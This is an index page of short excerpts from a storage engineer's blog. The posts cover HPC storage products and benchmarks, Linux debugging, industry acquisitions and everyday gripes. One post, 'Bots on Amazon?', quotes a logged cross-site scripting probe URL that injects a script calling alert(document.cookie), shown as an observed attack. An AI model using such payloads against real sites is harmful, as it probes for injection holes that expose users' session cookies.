They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
Virtualized infrastructure, with VM storage on software RAID + a rebuild == occasional VM pauses
Not what I was hoping for. I may explain more of what I am doing later (less interesting than why I am doing it), but suffice it to say that I’ve got a machine I’ve turned into a VM/container box, so I can build something I need to build. This box has a large RAID6 for storage. Spinning disk. Fairly well optimized, I get good performance out of it. The box has ample CPU, and ample memory.
Posts
There are real, and subtle differences between su and sudo
Most of the time, sudo just works. Every now and then, it doesn’t. Most recently was with a build I am working on, where I got a “permission denied” error for creating a directory. The reason for this was non-obvious at first. You “are” superuser after all when you sudo, right? Aren’t you? Sort of. Your effective user ID has been set to the superuser. Your real user ID still is yours.
Posts
Combine these things, and get a very difficult to understand customer service
In the process of disconnecting a service we don’t need anymore. So I call their number. Obviously reroutes to a remote call center. One where english is not the primary language. I’m ok with this, but the person has a very thick and hard to understand accent. Their usage and idiom were not American, or British English. This also complicates matters somewhat, but I am used to it. I can infer where they were from, from their usage.
Posts
A new (old) customer for the day job
Our friends at MSU HPCC now are the proud owners of a very fast/high performance Unison Flash storage system, and a ZFS backed high performance Unison storage spinning disk unit. Installed first week of Jan 2017. As MSU is one of my alma mater institutions, I am quite happy about helping them out with this kit. They’ve been a customer previously; they had bought some HPC MPI/OpenMP programming training in the dim and distant past.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
fortran for webapps
Use Fortran for your MVC web app. No, really … Here you are, coding your new density functional theory app, and you want to give it a nice shiny new web framework front end. Config files are so … 80s … Like in grad school, man … You want shiny new MVC action, with the goodness of fortran mixed in. Out comes Fortran.io.
Posts
She's dead Jim
It looks like (if the rumor is true) that Solaris will be pushing up the daisies soon. Note: Solaris != SmartOS This has been a long time coming. Combine this with Fujitsu dumping SPARC for headline projects … yeah … its likely over. FWIW: I like SmartOS. The issue for it are drivers. We tried helping, and were able to get one group to update their driver set. But getting others to update (specifically Mellanox) will be even harder now (and it was impossible beforehand, for reasons that were not Mellanox’s fault).
Posts
Inventory reduction event at the day job
We’ve got 3x Unison (https://scalableinformatics.com/unison) and 1x cadence (https://scalableinformatics.com/cadence) system that we need to clear out. The Unison machines are 5-7GB/s each, and the Cadence is 10-20GB/s and 200-600k IOPs (depending upon storage configuration). More info by emailing me. Everything is on a first come, first served basis, feel free to reach out if you’d like to hear more. Specs: ucp-01: Unison1 12 core, 128GB ram 2x40GbE or 4x10GbE ports 60x 2TB drives 4x 800GB SSD ucp-04: Unison2 12 core, 128GB ram 2x40GbE or 4x10GbE ports 60x 2TB drives 4x 800GB SSD usn-03: Cadence1 12 core, 128GB ram 2x40GbE or 4x10GbE ports 48x 400GB SATA SSD One more unlisted Unison unit with the same specs as the others, though with 3TB drives.
Posts
Its 2016, almost 2017 ... fix your application installer so it doesn't need to reboot my machine!
There I was running my windows in a window on my desktop. Running a nice little word processor from a company in Redmond, WA. Working on a document. About 15 minutes in, and I usually save at 30 minute boundaries … because … hey … they haven’t quite figured out that the word processor should do this for you … AUTOMATICALLY … Ok, I am shouting. Calm down. Anyway, for some reason, some little Cupertino company’s code pops up and says “hey, you wanna update me?
Posts
Watching a low level attack in process
I won’t say where, but it is fascinating watching what is being tried. I won’t divulge details of any sort (asymmetric information works to my advantage here).
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If its slow, IMO, its a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
The joy of IE and URLs, or how to fix ridiculous parsing errors on the part of some "helpers"
Short version. Day job sending some marketing out. URLs are pretty clear cut. Tested well. But some clients seem to have mis-parsed the url. Like with a trailing “)”. For some reason. That I don’t quite grok. I tried a few ways of fixing it. Yes, I know, because I fixed it, I baked it into the spec. /sigh First was a regex rewrite rule. Turns out the rewrite didn’t quite work the way it was intended, and it killed the requests.
Posts
Build me a big data analysis room
This was the request that showed up on our doorstep. A room. Not a system. But a room. Visions of the Star Trek NG bridge came to mind. Then the old SGI power wall … 7 meters wide by 2 meters high, driven by an awesomely powerful Onyx system (now underpowered compared to a good Nvidia card). Of course, the budget wouldn’t allow any of these, but it was still a cool request.
Posts
Running conditioning on 4x Forte #HPC #NVMe #storage units
This is our conditioning pass to get the units to stable state for block allocations. We run a number of fill passes over the units. Each pass takes around 42 minutes for the denser units, 21 minutes for the less dense ones. After a few passes, we hit a nice equilibrium, and performance is more deterministic, and less likely to drop as block allocations gradually fill the unit. We run the conditioning over the complete device, one conditioning process per storage device, with multiple iterations of the passes.
Posts
Amazing statistics
In the last year, this has been what this blog has seen for visitors/viewers and page views. 188,654 (unique) visitors 2,572,665 page views I am … humbled …
Posts
Aquila launches Aquarius
Story is here, at the always excellent InsideHPC site. Scroll the linked page on Aquarius to see some of their tech and their partners … Congrats guys! Great job!
Posts
New #HPC #storage configs for #bigdata , up to 16PB at 160GB/s
This is an update to Scalable Informatics “portable petabyte” offering. Basically, from 1 to 16PB of usable space, distributed and mirrored metadata, high performance (100Gb) network fabric, we’ve got a very dense, very fast system available now, at a very aggressive price point (starting configs around $0.20/GB). Batteries included … long on features, functionality, performance. Short on cost. We are leveraging the denser spinning rust drives (SRD), as well as a number of storage technologies that we’ve built or integrated into the systems.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
An article on Python vs Julia for scripting
For those whom don’t know, Julia is a very powerful new language, which aims to leverage a JIT compilation mechanism to generate very fast numerical/computational code in general from a well thought out language. I’ve argued for a while that it feels like a better Python than Python. Python, for those whom aren’t aware, is a scripting language which has risen in popularity over the recent years. It is generally fairly easy to work in, with a few caveats.
Posts
M&A time: HPE buys SGI, mostly for the big data analytics appliances
I do expect more consolidation in this space. There aren’t many players doing what SGI (and the day job) does. The story is here. The interesting thing about this is, that this is in the high performance data analytics appliance space. As they write:
12-16% CAGR for data analytics, which I think is low … . And the point they may about the data explosion is exactly what we talk about as well.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
About that cloud "security"
Wow … might want to rethink what you do and how you do it. See here. Put in simple terms, why bother to encrypt if your key is (trivially) recoverable? I did not realize that side channel attacks were so effective. Will read the paper. If this isn’t just a highly over specialized case, and is actually applicable to real world scenarios, we’ll need to make sure we understand methods to mitigate.
Posts
Ah Gmail ... losing more emails
So … my wife and I have private gmail addresses. Not related to the day job. She sends me an email from there. It never arrives. Gmail to gmail. Not in the spam folder. But to gmail. So I have her send it to this machine. Gets here right away. We moved the day job’s support email address off gmail (its just a reflector now) into the same tech running inside our FW.
Posts
Real scalability is hard, aka there are no silver bullets
I talked about hypothetical silver bullets in the recent past at a conference and to customers and VCs. Basically, there is no such thing as a silver bullet … no magic pixie dust, or magical card, or superfantastic software you can add to a system to make it incredibly faster. Faster, better performing systems require better architecture (physical, algorithmic, etc.). You really cannot hope to throw a metric-ton of machines at a problem and hope that scaling is simple and linear.
Posts
Having to do this in a kernel build is simply annoying
So there are some macros, DATE and TIME that the gcc compiler knows about. And some people inject these into their kernel module builds, because, well, why not. The issue is that they can make “reproducible builds” harder. Well, no, they really don’t. That’s a side issue. And of course, modern kernel builds use -Wall -Werror which converts warnings like macro "__TIME__" might prevent reproducible builds [-Werror=date-time] into real honest-to-goodness errors.
Posts
Going to #KXcon2016 this weekend to talk #NVMe #HPC #Storage for #kdb #iot and #BigData
This should be fun! This is being organized and run by my friend Lara of Xand Marketing. Excellent talks scheduled, fun bits (raspberry pi based kdb+!!!). Some similarities with the talk I gave this morning, but more of a focus on specific analytics issues relevant for people with massive time series data sets and a need to analyze them. Looking forward to getting out to Montauk … haven’t been there since I did my undergrad at Stony Brook.
Posts
Gave a talk today at #BeeGFS User Meeting 2016 in Germany on #NVMe #HPC #Storage
… through the magic of Google Hangouts. I think they will be posting the talk soon, but you are welcome to view the PDF here.
Posts
Success with rambooted Lustre v2.8.53 for #HPC #storage
[root@usn-ramboot ~]# uname -r 3.10.0-327.13.1.el7_lustre.x86_64 [root@usn-ramboot ~]# df -h / Filesystem Size Used Avail Use% Mounted on tmpfs 8.0G 4.3G 3.8G 53% / [root@usn-ramboot ~]# [root@usn-ramboot ~]# rpm -qa | grep lustre kernel-3.10.0-327.13.1.el7_lustre.x86_64 kernel-tools-3.10.0-327.13.1.el7_lustre.x86_64 kernel-devel-3.10.0-327.13.1.el7_lustre.x86_64 lustre-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-tools-libs-devel-3.10.0-327.13.1.el7_lustre.x86_64 lustre-osd-ldiskfs-mount-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-headers-3.10.0-327.13.1.el7_lustre.x86_64 lustre-osd-ldiskfs-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-tools-libs-3.10.0-327.13.1.el7_lustre.x86_64 lustre-modules-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 This means that we can run Lustre 2.8.x atop Unison. Still pre-alpha, as I have to get an updated kernel into this, as well as update all the drivers.
Posts
Its not perfect, but we have CentOS/RHEL 7.2 and Lustre integrated into SIOS now
Lustre is infamous for its kernel specificity, and it is, sadly, quite problematic to get running on a modern kernel (3.18+). This has implications for quite a large number of things, including whole subsystems with a partial back-porting to earlier kernels … which quite often misses very critical bits for stability/performance. I am not a fan of back porting for features, I am a fan of updating kernels for features. But that is another issue that I’ve talked about in the past.
Posts
reason #31659275 not to use java
As seen on hacker news linking to an Arstechnica article, this little tidbit. This is the money quote:
I know it seems obvious now to Google and to others, but mebbe … mebbe … they should rethink building a platform in a non-open language? I’ve talked about OSS type systems in terms of business risk for well more than a decade. OSS software intrinsically changes the risk model, so that you do not have a built in dependency upon another stack that could go away at any moment.
Posts
isn't this the definition of a Ponzi scheme?
From this article at the WSJ detailing the deflation of the tech bubble in progress now.
A Ponzi scheme is like this:
Posts
Every now and then you get an eye opener
This one is while we are conditioning a Forte NVMe unit, and I am running our OS install scripts. Running dstat in a window to watch the overall system …
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 2 5 94 0 0 0| 0 22G| 218B 484B| 0 0 | 363k 368k 1 4 94 0 0 0| 0 22G| 486B 632B| 0 0 | 362k 367k 1 4 94 0 0 0| 0 22G| 628B 698B| 0 0 | 363k 368k 2 5 92 1 0 0| 536k 110G| 802B 2024B| 0 0 | 421k 375k 1 4 93 2 0 0| 0 22G| 360B 876B| 0 0 | 447k 377k Wait … is that 110GB/s (2nd line from bottom, in the writ column) ?
Posts
there are times
that try my patience. Usually with poorly implemented filtering tools of one form or another. The SPF mechanism is to provide an anti-spoofing system, which identifies which machines are allowed to send email in your domain name. The tools that purport to test it? Not so good. I get conflicting answers from various tools for a simple SPF record. The online tester (interactive) seems to work and show me my config is working nicely.
Posts
Of course, this means more work ahead
Our client code that pulls configuration bits from a boot server works great. But the config it pulls is distribution specific. Where we need to be is distribution/OS agnostic, and set things in a document database. Let the client convert the configuration into something OS specific. This is, to a degree, a solved problem. Indeed, etcd is just a modern reworking of what we did with the client code … using a fixed client (e.
Posts
Very preliminary RHEL7/CentOS7 SIOS base support
This is rebasing our SIOS tech atop RHEL7/CentOS7. Very early stage, pre-alpha, lots of debugger windows open … but …
[root@usn-ramboot ~]# cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) [root@usn-ramboot ~]# uname -r 4.4.6.scalable [root@usn-ramboot ~]# df -h / Filesystem Size Used Avail Use% Mounted on tmpfs 8.0G 4.7G 3.4G 59% / Dracut is giving me a few fits, but I’ve finished that side for the most part, and am now into the debugging the post-pivot environment.
Posts
When spam bots attack
I’ve been fixing up a few mail servers to be more discriminating over their connections. And I’ve noted that I didn’t have any automated tooling to block the spammers. I have lots of tooling to filter and control things. So I wrote a quick log -> ban list generator. Not perfect, but it seems to work nicely. Like I don’t have enough to do this week. /sigh Meetings tomorrow starting at 8am.
Posts
Why sticking with distro packages can be (very) bad for your security
I’ve been keeping a variety of systems up to date, updating security and other bits with zealous fervor. Security is never far from my mind, as I’ve watched bad practices being used at customers resulting in any number of things … from minor probes, through (in one case, with a grad student impacted by a windows key logger), taking down a linux cluster, but not before knocking the university temporarily off the internet.
Posts
Not-so-modern file system errors in modern file systems
On a system in heavy production use, using an underlying file system for metadata service, we see this:
kernel: EXT4-fs warning: ext4_dx_add_entry:1992: Directory index full! Ok, where does this come from? Ext3 had a limit of 32000 directory entries per directory, unless you turned on the dir_index feature. Ext4 theoretically has no limit. Well, its 64000 if you don’t use dir_index. Which we do use. Really the feature you want is dir_nlink.
Posts
SIOS-metrics being updated soon with our process table sampler
I needed to look at processes on the machine I’d been spending time debugging, in terms of what was running, what the state, the allocations, the IO, etc. Something was causing a hard panic, and it seemed correlated with an application issue. I didn’t have a process space sampler, so I wrote one. Takes one sample per second right now (configurable) across the whole process space. Uses 1% CPU or so normally.
Posts
Caught a not-so-cool bug in a hypervisor running on a production machine
Not naming names. Its a good product. It just gives up the ghost when you request 1.5x available memory, and the OS actually tries … tries … to fulfill the request. I thought I had set the maximum oversubscription amount to 85% of swap + physical. Yet, along came a nice spike and WHAMMO. Down the machine went. That this was a high visibility production machine, with hard uptime requirements … not so good.
Posts
Sadly we can't afford the time or people to go to BioIT world expo next week
Short handed + lots of very near term projects + many things that demand our attention == us pulling out. I wish it was otherwise, but we have limited people bandwidth, and I can’t afford 2 days doing booth duty while we have hard deliverables. /sigh Maybe 2017. We’ll see. And no, even though HPC on Wall Street is the same time, we aren’t going to that either. I like the show, but same issue with timing/people/projects.
Posts
Ways to not reach me
I’ve implemented a very strict policy for inbound phone calls. If I don’t recognize the number it goes to voicemail. If its important enough to call me, its important enough to leave me a message. If a call comes in with an unknown number, I won’t answer it. It can go through to voicemail. If it comes through with a restricted number, it only goes through to voicemail, though I am starting to think that such calls should be automatically blocked (as in never even given the opportunity to go to voicemail).
Posts
Spent the day fighting with a database that did not honor "be liberal in what you accept"
To put it bluntly, its escaping not only doesn’t match its docs, but appears to be internally inconsistent. I kept getting errors that google couldn’t really find much on, other than to suggest they were fixed bugs. I might have something to say on that. Looking forward to the next phase of this work, where we skip this db and focus on kdb+.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
Just another day, debugging someone's installer
I like the installers that attempt (and then fail) to calculate what they need, and generate installation target names programmaticlly. I know … I know… its an attempt to reduce the level of pain for some folks, as the algorithm works for some sets of inputs. But not mine. And mine are valid. What we need is an –I_know_what_the_heck_I_am_asking_for_so_please_just_do_the_install switch. Or, I have their installer (thankfully non-terrible perl code) up in an editor to see if I can find the offensive part, and then I can patch it (and send them the patch).
Posts
What a difference a CEO makes
So Microsoft will be starting to produce Linux software. This would never have happened under the previous CEO. With this change, Microsoft’s addressable market just grew fairly significantly for this product. Of course, there are ways for them to mess this up. Such as if they have features only available under windows. That would rather permanently consign this product to the dustbin of history. This said, I am hopeful that this CEO gets it, and will make sure that the changes Microsoft needs to make, are, in fact, made.
Posts
One of those days where you search for information on a problem
and find that you wrote on a mailing list almost half a decade ago about the problem, that it hasn’t been fixed. This is a little sad.
Posts
Fixed the asymmetric problem by moving to a different switch/network
Long story but it was a time sensitive POC bug. I like the switch I was using, but we needed this up ASAP. Customer was waiting. So I yanked all the 40GbE cards from the servers, put in multiport 10GbE, set up 802.3ad LAGs. Then moved to the Arista in the lab (great switch BTW). Its been years since I set one up, so out came the manual. Read up on setting up the LAGs and port channels … I had forgotten why I liked using them so much.
Posts
Cool asymmetric network performance happened to mess up a customer benchmark
A bunch of Unison systems, a 40 GbE network interconnecting them, and a bunch of client nodes on 40GbE -> 4x 10GbE links (to accomodate enough clients for the load testing). 40GbE < -> 40GbE works great. Full bandwidth, only minor oddities (single thread performance around 27Gb/s, need multiple threads to hit 40). 10GbE < -> 10GbE works great. Full bandwidth, nothing odd. 10GbE -> 40GbE works great, get about the expected bandwidth (10GbE).
Posts
Interesting ... so will they be sued for patents
Turns out next Ubuntu is fully baking in ZFS into the kernel and distributing it. This seems directly contrary to the licensing CDDL vs GPL, and chances are some folks will be unhappy with it. The big question is, will the IP holders sue. Because if they don’t, they may actually have given up their right to sue. Or has Canonical obtained a license to distribute. This is my understanding as I am not a lawyer, so I can’t really be sure of this (and I’d recommend you ask one if you are not sure).
Posts
New tool to help visualize /proc/interrupts and info in /proc/irq/$INT/
This is a start, not ready for release yet, but already useful as a diagnostic tool. I wanted to see how my IRQs were laid out, as this has been something of a persistent problem. I’ve built some intelligence into our irqassign.pl tool, but I need a way to see where the system is investing most of its interrupts. I omit (on purpose) IRQs that have been assigned, but have generated no interrupts.
Posts
Not sufficiently caffeinated for technical work today
I just spent 30 minutes trying to figure out why the 32 bit q process would run on one machine, while the identical tree and config would fail with a license expired on my desktop (development box). Turns out one should check for an old license file in one’s home directory. /sigh I think I need to send an RFE for an ‘–low-coffee-mode’ option.
Posts
Radio Free HPC is (as usual) worth a listen
Good wrap up of last years trends, this week at InsideHPC Radio Free HPC podcast. We get a small mention around 10:50 or so. Thats not why its an especially good listen. The team arrived at many of the same conclusions we did last year, which is why we brought out Forte, and we have some additional products planned in that line for later on in the year. Basically NVM and variants, NVMe, etc.
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
Container jutsu
Linux containers are all the rage, with Docker, rkt, lxd, etc. all in market to various degrees. You have companies like Docker, CoreOS, and Rancher all vying for mindshare, not to mention some of the plumbing bits by google and many others. I don’t think they are a fad, there is much that is good with containers, when they are done right. To see how they are done right, have a good hard long look at SmartOS.
Posts
Hard filtering of calls
I find that, over time, my cell phone number has propagated out to spammers/scammers whom want to call me up to sell me something. The US national do-not-call registry hasn’t helped. The complaints I’ve filed haven’t helped. So I filter. My filtering algo looks like this:
if (number_is_known_person_or_org(phone_number)) { take_call_if_possible(); else if (number_is_unknown(phone_number)) { filter_stage_2(phone_number) } function filter_stage_2(phone_number) { // I ignore 80% of numbers I don't know, let them go to // voicemail.
Posts
Nutanix files for IPO
Short story here. I am not going to pour over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
Toshiba contemplating spinning out NAND flash
This is remarkable if true, and if they follow through with it, it will change the landscape of Flash quite a bit. Right now there are 43 major flash providers, and a few smaller ones. Building flash fabs is expensive, even given the demand and process improvements, there is still quite a bit of investment required to set up a flash fab. Toshiba has some cool kit here, we’ve worked with it (and in full disclosure, we were talking about working more closely with them in the past).
Posts
Google GMail is broken, not passing emails, losing others
Yeah, the headline says it all. The reason I rolled to GMail (and am paying for it for each user and then some) for the corporate services was, well, they promised to make running email easy, painless, and I wouldn’t have to worry about email management any more. Now I have to worry about pissed off customers whom are angry at me for not responding, even though I see the outbound emails in my sent folder, and from our ticketing system.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Good read on market sizing for VCs and entrepreneurs
Not a how to guide, but a higher level meta discussion … about that market size discussion. See here. I’ve experienced the endless cycle of meetings over “size of market”. Not fun. These days, I have a very simple classifier with respect to investors.
foreach investor (list_of_investors) { if (investor->says_yes_sends_term_sheet_and_check) { put_money_to_work_building_value() } else { add_to_list_of_investors_who_didnt_say_yes_and_follow_through_with_money() } } This is pseudo code for the algo you need. Any answer which is yes is good.
Posts
Bots on Amazon?
Seeing lots of these in my web server logs:
https://scalableinformatics.com/?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E which are sent there from a sentinel redirection mechanism on a different web server. A number, maybe 10 or so? Amazon hosts are now doing this. I am guessing this would be real darned easy to trace back to the sources. And either someone’s instance in the cloud is not under their control, or someone is paying Amazon to let them run bots.
Posts
Watching dracut, udev, systemd, and plymouth all battle each other for nfs/ramboot
I can’t even begin to describe the complete and utter broken-ness of this mess. This doesn’t look like systemd issue, its just the poor stack trying to get everything else working. But plymouth. Seriously. It should be given the old-yeller treatment. And watching udev not … settle … is … amusing. While its doing that, the dracut options of debug, drop to a shell, break, etc. aren’t working. This isn’t engineering at this point.
Posts
Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage
Simple test case, no file system … using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k 4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352 0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413 0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306 0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483 0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377 8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k 9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k 10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k 12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k 11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k 11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k Writes around 12.
Posts
10TB PMR drives for Unison #hpc #storage systems, think 600TB/4U unit with @BeeGFS, @Ceph, and others
WD/HGST just released details on a PMR (aka “real”, non-archive class) hard disk. You can read the specs here. We will be offering these in Unison HPC storage systems, to provide up to 600TB/4U unit, or up to 6PB per rack of 10 unison chassis. Coupled with our 100Gb fabric, we expect to be able to drive about 8-9 GB/s per chassis. And thats before we leverage the distributed journaling/metadata NVMe’s rear mounted on the units.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many thing I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Massive Unapologetic Firepower part 3: Forte
Forte has uncloaked, website is being updated. You can email me (landman@scalableinformatics.com) for more info. Pictures speak louder than words. Have a look.
That is 20+ GB/s for streaming sequential IO. Then, 4kB random reads …
That is, 5+ Million IOPs. Specs include Price point for this is $50k for 48TB, $1/GB. Pre-order now, shipping in a few weeks.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Moving inventory out to make room for new stuff
We have a bunch of units to move out. These are from a recent POC project, and we have a new architecture project that needs all that rack space and then some … the team are building Franken-boxen clients for this project, so we have enough requestors on the network. Parts start arriving next week for that, and we really need to clear this out soon. I hate seeing good gear sitting idle on a storage shelf when it could be helping solve hard problems.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
Just give me a huge fast storage system, and a mighty network to delivery it by
A system in the lab. Here is a snapshot from our management GUI.
[ ](/images/unison-poc-system.png)
A couple things to note:
In the lower right corner, you can see the size of the /mnt/unison file system. This is an all flash system. No, there is no compression, nor dedup going on here. We could, but most of the use cases we are dealing with these days … this would not be a win.
Posts
Looking forward to showing off a new product at SC15
Think … pretty interesting performance … Think very … very dense … Think … there may be some benchies leaked here soon.
Posts
M&A: Huge ... WD acquires SanDisk
This is huge. Now Seagate has a relationship with Micron, Toshiba has its own disks and shares a fab with SanDisk (though I think with this acquisition, that will rapidly change). Ok … so the HD vendors are busy snapping up the Flash makers. Is Micron next? Rumors of something have been swirling for a while. Note also, SanDisk has their InfiniFlash unit. WD simply did not have storage appliances. This gets them into that space, and directly competing with the likes of all the smaller startup all flash array (AFA) vendors.
Posts
Finding needles in haystacks covered in a fallen down barn
Ok … this one was very annoying. Imagine you are trying to diagnose a system crash on a production unit. The crash is quite specific in the subsystems … being one where the interrupt handler catches an exception, and then you start piling up softirq contexts. Its on the network side of things. You discover that the switch and the NIC are, somehow, incredibly, not quite compatible with each other. I can’t assign blame for this as I don’t know who is at fault.
Posts
M&A: EMC gobbled by Dell
Need to think how this will play out. The Register’s take is here. It seems that this will solve the “shareholder value” problem indicated by Elliot Management (e.g. they wanted more return on their investment). As part of the increasing the return and value return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won’t protest), Dell will have
Posts
The end of java in the browser
Coming soon. Mozilla is turning off NPAPI support at the end of next year. Java and java applets rely upon NPAPI to work. Needless to say, Java support in the browser is going to end. While this is good news, they are still going to allow flash. Which is less good. What is interesting about this, is that this sunsets support for many of the remote console applications that depend upon Java (for the moment) to provide KVM like capabilities.
Posts
End days must be on hand ... Perl 6 is out
